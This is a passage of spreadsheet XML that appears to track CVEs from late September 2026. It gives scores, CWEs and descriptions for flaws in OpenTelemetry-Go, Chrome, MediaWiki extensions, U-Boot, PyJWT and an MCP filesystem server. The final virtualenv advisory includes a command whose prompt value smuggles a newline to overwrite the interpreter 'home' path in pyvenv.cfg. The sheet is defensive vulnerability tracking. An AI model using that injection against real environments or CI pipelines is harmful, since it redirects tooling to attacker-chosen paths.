          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.21.0, the go.opentelemetry.io/otel/sdk/log BatchingProcessor can enter a tight CPU loop when attacker-driven log emission fills its asynchronous export buffer while the exporter is backpressured. NewBatchingProcessor wraps the exporter with newBufferExporter(exporter, 1), and the poll loop calls queue.TryDequeue and bufferExporter.EnqueueExport before immediately signaling pollTrigger whenever the queue remains at or above batchSize. Because a failed nonblocking EnqueueExport leaves the queue length unchanged, the processor repeatedly retries without waiting for its ticker, exhausting CPU and degrading or denying service in the embedding process. This issue is fixed in version 0.21.0.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81872</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95375</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in BrowserTag in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95375</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100238</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Flow Extension allows Stored XSS.
This issue affects Mediawiki - Flow Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100238</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100243</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - WikiSEO Extension allows Stored XSS.
This issue affects Mediawiki - WikiSEO Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100243</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100245</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Wikibase Extension allows Stored XSS.
This issue affects Mediawiki - Wikibase Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100245</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102329</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in WebUI in Google Chrome prior to 154.0.8037.92 allowed a remote attacker to bypass web origin policy into a privileged page via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102329</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103045</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Refreshed skin allows Stored XSS.
This issue affects Mediawiki - Refreshed skin: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103045</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103046</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Wikimedia Foundation MediaWiki - WikiLambda extension allows Stored XSS.
This issue affects MediaWiki - WikiLambda extension: before 1.46.1.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103046</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103047</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - CentralAuth extension allows Stored XSS.
This issue affects Mediawiki - CentralAuth extension: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103047</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103049</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: before 1.46.1.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103049</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103050</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - MassMessage extension allows Stored XSS.
This issue affects Mediawiki - MassMessage extension: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103050</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103051</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - CentralNotice extension allows Stored XSS.
This issue affects Mediawiki - CentralNotice extension: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103051</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.9 → 6.0)</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71972</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>U-Boot through 2026.10-rc5 contains an out-of-bounds write vulnerability in the video_display_rle8_bitmap function in drivers/video/video_bmp.c. Attackers can supply a crafted RLE8-compressed BMP image to corrupt memory adjacent to the framebuffer and crash the bootloader.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71972</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102274</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.9.0 until 2.14.0, PyJWKSet does not catch the plain ValueError raised for malformed RSA JWK components by RSAAlgorithm.from_jwk in  jwt/api_jwk.py. This occurs when a JWK Set contains a malformed RSA key alongside otherwise usable keys. As a result, one malformed member aborts construction of the entire PyJWKSet. Consequently, applications can experience authentication failures or request-level denial of service. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102274</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79534</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>mark3labs mcp-filesystem-server v0.11.1 is vulnerable to Directory Traversal due to an improper link resolution in validatePath (filesystemserver/handler/helper.go). When filepath.EvalSymlinks returns os.IsNotExist for a dangling symlink, the fallback validates only the parent directory and returns the unresolved path, so write_file (and modify_file, copy_file, move_file, create_directory) follows a pre-existing dangling symlink located inside an allowed directory and creates a file outside the configured allowed directories.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79534</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102938</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr">
        <is>
          <t>21.7.11</t>
        </is>
      </c>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr"/>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>### Summary
`pyvenv.cfg` is a line-based format with no escape syntax. `PyEnvCfg.write()` wrote values verbatim, while `PyEnvCfg._read_values()` parses the file with `str.splitlines()`. A value containing a line boundary therefore became additional configuration lines, and because reading is last-wins, the injected keys replaced any key written earlier in the file.
### Impact
The `prompt` value is the reachable input: it is set by `--prompt`, by the `VIRTUALENV_PROMPT` environment variable, or from the config file, and `write()` emits `prompt` before `home`. A crafted prompt can therefore set `home` in the generated `pyvenv.cfg`:
```console
$ virtualenv --prompt $'x"\nhome = /attacker/path\nprompt = "z' venv
$ grep '^home' venv/pyvenv.cfg
home = /attacker/path
```
`home` is what tooling reads to locate the base interpreter, so a consumer that trusts it can be pointed elsewhere. `implementation`, `version_info`, `version`, `executable`, `command` and `virtualenv` are also written before `prompt` and can be replaced the same way.
This requires the prompt to come from somewhere other than the person running the command, for example a CI job templating a branch name into it, tooling deriving an environment name from user-supplied data, or an inherited `VIRTUALENV_PROMPT`. Where the operator supplies the prompt directly they already control the command line, and the effect is corruption rather than privilege gain: the value is truncated at the boundary and read back with a dangling quote.
### Details
